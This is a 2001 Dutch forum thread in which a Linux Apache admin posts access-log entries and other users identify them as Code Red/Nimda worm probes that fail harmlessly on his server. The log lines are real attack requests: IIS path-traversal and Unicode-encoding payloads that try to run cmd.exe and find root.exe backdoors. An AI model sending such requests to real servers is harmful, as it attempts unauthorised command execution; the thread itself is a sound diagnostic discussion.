[suse72]apache access.log: hackers?

Pagina: 1
Acties:

  • EWS99
  • Registratie: Maart 2001
  • Laatst online: 18-08 07:20
Uit de log: /var/log/httpd/access_log
weet iemand wat dit wil zeggen? Wordt ik gehackt of zow?
BTW apache draait op SuSE 7.2
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
62.163.193.x - - [06/Dec/2001:17:08:02 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 279
62.163.193.x - - [06/Dec/2001:17:08:02 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 277
62.163.193.x - - [06/Dec/2001:17:08:02 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
62.163.193.x - - [06/Dec/2001:17:08:02 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
62.163.193.x - - [06/Dec/2001:17:08:03 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
62.163.193.x - - [06/Dec/2001:17:08:03 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
62.163.193.x - - [06/Dec/2001:17:08:03 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
62.163.193.x - - [06/Dec/2001:17:08:03 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
62.163.193.x - - [06/Dec/2001:17:08:04 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
62.163.193.x - - [06/Dec/2001:17:08:04 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
62.163.193.x - - [06/Dec/2001:17:08:04 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
62.163.193.x - - [06/Dec/2001:17:08:04 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
62.163.193.x - - [06/Dec/2001:17:08:04 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
62.163.193.x - - [06/Dec/2001:17:08:05 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
62.163.193.x - - [06/Dec/2001:17:08:08 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
62.163.193.x - - [06/Dec/2001:17:08:11 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301

Hier had uw advertentie kunnen staan!


  • Tomaat
  • Registratie: November 2001
  • Laatst online: 13-05 13:50
CODE RED!!

  • ThaDude
  • Registratie: December 2000
  • Laatst online: 21:24

ThaDude

Hang Loose

Is een gevolg van een van die worm's die nu rond gaan!
ze proberen cmd van windows op je linux bak uit :D

zolang je maar 404 of 400 hebt niks aan de hand

We're machines just like everything else in nature. (gasloos sinds 01-10-2020, WP: SW75YAA/ERSD-VM2D, DJG WPS 300, 18 hp CPC, 11,1 kWp


  • Tomaat
  • Registratie: November 2001
  • Laatst online: 13-05 13:50
Jah, dat is dus code red.
Maar dat werkt alleen op een WinNT box :D

Verwijderd

Heb je toevallig Winroute draaien op een windowsbak die verbinding heeft met inet?

  • Tomaat
  • Registratie: November 2001
  • Laatst online: 13-05 13:50
Op donderdag 13 december 2001 16:10 schreef e-forze het volgende:
Heb je toevallig Winroute draaien op een windowsbak die verbinding heeft met inet? :? :? :?
BTW apache draait op SuSE 7.2

DUH!

Verwijderd

Op donderdag 13 december 2001 16:12 schreef da_man98 het volgende:

[..]

BTW apache draait op SuSE 7.2

DUH! = }:O
ik zal het uitleggen:
Als iemand een Winroute bak aan z'n inetlijn heeft staan, waardoor het inetverkeer geroute wordt naar bijvoorbeeld de webserver (als je het nog kan volgen, da_whatever98).
Kan iemand die je wil hacken (in de foute zin van het woord) denken dat ie in een Windows omgeving zit (dus IIS)
iemand die denkt dat ie in een Windows omgeving zit, zal dus ook Windows commando's gebruiken op een machine (in dit geval de SuSE bak met Apache)

da_man98:
Probeer er de volgende keer eens achter te komen wat een persoon zoal post, voordat je met DUHbielentaal aankomt.

  • Tomaat
  • Registratie: November 2001
  • Laatst online: 13-05 13:50
}:O }:O }:O

Sorry hoor!

Maarre wie gebruikt Windows nou om te routen en dan Linux als webserver. Kan je toch gewoon die Linux bak als router én als webserver gebruiken. Daarom zei ik dus DUH!

  • Joto
  • Registratie: Juni 2000
  • Laatst online: 16:36
heel normaal tegenwoordig,

zie mijn sign, zoek op nimda / code red worm

learn to live with it .... Sorry

1+1+1 = 1


  • EWS99
  • Registratie: Maart 2001
  • Laatst online: 18-08 07:20
Code RED was ook in mijn gedachte opgekomen. Nix dus om me zorgen over te maken, aangezien:
Internet <-- SuSE72 router (apache etc) <-- WinXP werkstation

Hier had uw advertentie kunnen staan!


Verwijderd

Op donderdag 13 december 2001 16:25 schreef da_man98 het volgende:
Sorry hoor!

Maarre wie gebruikt Windows nou om te routen en dan Linux als webserver. Kan je toch gewoon die Linux bak als router én als webserver gebruiken. Daarom zei ik dus DUH!
You are forgiven ;)
Het ging mij erom dat er allemaal van die mafkezen zijn die gelijk beginnen met het soort opmerkingen die jij net maakte, dat stoort mij (maar goed, da's mijn mening)

Er zijn wel mensen die het anders dan anders doen: Windows als router, andere OS-en achter de router.
Tja, sommige mensen zijn nou eenmaal wat beter met Windows dan met linux, en doen het dus net even andersom.
(ik kreeg toevallig 2wk geleden van iemand te horen, dat hij het op de voor ons 'verkeerde' manier heeft gedaan)

Verwijderd

Op donderdag 13 december 2001 16:09 schreef da_man98 het volgende:
Jah, dat is dus code red.
Nimda toch?

Edit: sorry, was al gezegd, overheen gelezen.
Pagina: 1